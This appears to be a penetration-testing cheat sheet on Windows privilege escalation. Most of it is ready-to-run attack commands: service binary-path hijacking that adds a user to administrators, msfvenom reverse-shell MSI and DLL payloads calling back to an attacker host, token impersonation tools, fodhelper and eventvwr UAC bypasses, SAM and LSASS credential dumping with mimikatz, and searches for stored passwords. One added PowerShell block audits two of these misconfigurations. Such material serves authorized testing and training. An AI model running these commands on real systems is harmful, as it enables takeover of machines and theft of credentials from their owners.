---
title: "Privilege Escalation Windows"
domain: security
subdomain: pentest
phase: 05-post-exploitation
type: snippet
tags: [privesc, windows, uac, token, alwaysinstallelevated]
difficulty: advanced
status: stable
updated: "2025-05-10"
---
## Automated enumeration

```powershell
# WinPEAS
.\winPEASx64.exe

# PowerUp (PowerSploit)
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Seatbelt
.\Seatbelt.exe -group=all
```

## System information

```cmd
systeminfo
whoami /all
net user
net localgroup administrators
```

## Vulnerable services

```cmd
# Services whose configuration is writable (accesschk: write access for Authenticated Users)
sc.exe qc {{SERVICE_NAME}}
accesschk.exe -accepteula -uwcqv "Authenticated Users" *

# Overwrite the binary path (the command runs under the service account on restart)
sc.exe config {{SERVICE_NAME}} binpath= "cmd.exe /c net localgroup administrators {{USER}} /add"
sc.exe stop {{SERVICE_NAME}}
sc.exe start {{SERVICE_NAME}}

# Unquoted service paths: auto-start, outside C:\Windows, and not wrapped in quotes
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows" | findstr /i /v """
```

## AlwaysInstallElevated

```cmd
# Check the registry keys
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both are 1, generate a malicious MSI (attacker side):
msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f msi -o shell.msi

# Run on the target:
msiexec /quiet /qn /i C:\Temp\shell.msi
```
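As an added audit helper (not from the original page), the following PowerShell checks the two misconfigurations of the previous two sections the way a reviewer verifies or remediates them: it lists services whose unquoted binary path contains a space (which the wmic one-liner only approximates), and returns `$true` only when AlwaysInstallElevated is 1 in both hives. The function names are assumptions of this example.

```powershell
# Added audit helper, not part of the original page. Function names are
# assumptions of this example.

function Get-UnquotedServicePath {
    # Only the executable part matters: a path is a split-point candidate when
    # it is not wrapped in quotes and contains a space before ".exe".
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' } |
        ForEach-Object {
            if ($_.PathName -match '^(?<exe>.+?\.exe)') {
                $exe = $Matches['exe']
                if ($exe -match ' ' -and $exe -notlike "$env:SystemRoot\*") {
                    [pscustomobject]@{
                        Name      = $_.Name
                        StartMode = $_.StartMode
                        Path      = $_.PathName
                    }
                }
            }
        }
}

function Test-AlwaysInstallElevated {
    # The Installer elevates only when the value is 1 under BOTH hives.
    $keys = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    foreach ($k in $keys) {
        $v = Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if (-not $v -or $v.AlwaysInstallElevated -ne 1) { return $false }
    }
    return $true
}

# Usage: list candidate services (all start modes, so manual ones show too),
# then report the installer policy.
Get-UnquotedServicePath | Format-Table -AutoSize
if (Test-AlwaysInstallElevated) {
    Write-Warning 'AlwaysInstallElevated is enabled in both HKCU and HKLM'
}
```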

## Token Impersonation

```cmd
# In meterpreter:
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"

# PrintSpoofer (requires SeImpersonatePrivilege)
.\PrintSpoofer64.exe -i -c cmd

# Juicy Potato (Windows < 2019; -l is the local COM listen port, -c the CLSID of a SYSTEM COM server)
.\JuicyPotato.exe -l {{LPORT}} -p cmd.exe -t * -c {{CLSID}}

# GodPotato
.\GodPotato-NET4.exe -cmd "cmd /c whoami"
```

## UAC Bypass

```powershell
# Fodhelper bypass
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

# Eventvwr bypass
$cmd = "cmd /c start cmd.exe"
New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" "(default)" $cmd
Start-Process "eventvwr.exe"
```

## DLL Hijacking

```cmd
# Find missing DLLs: in procmon, filter on Result "NAME NOT FOUND" and Path ending in ".dll"
procmon.exe

# Generate a malicious DLL (attacker side)
msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f dll -o hijack.dll

# Copy it into the writable directory (quote the path: it contains spaces)
copy hijack.dll "C:\Program Files\{{APP}}\missing.dll"
```

## Stored credentials

```cmd
# Windows Credential Manager
cmdkey /list

# Use the stored credentials
runas /savecred /user:{{DOMAIN}}\{{USER}} cmd.exe

# SAM dump (requires SYSTEM)
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
# Attacker side:
python3 impacket/secretsdump.py -sam SAM -system SYSTEM LOCAL

# LSASS dump
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

# Task Scheduler creds (findstr has no "\|" alternation; use one /c: per literal string)
schtasks /query /fo LIST /v | findstr /i /c:"TaskName" /c:"Run As User"
```

## Passwords in files

```cmd
findstr /si password *.xml *.ini *.txt *.config 2>nul
dir /s /b *pass* *cred* *vnc* *.config 2>nul
```

<Warning>
Privilege escalation techniques leave traces in the Windows event logs. Document every step for the report.
</Warning>
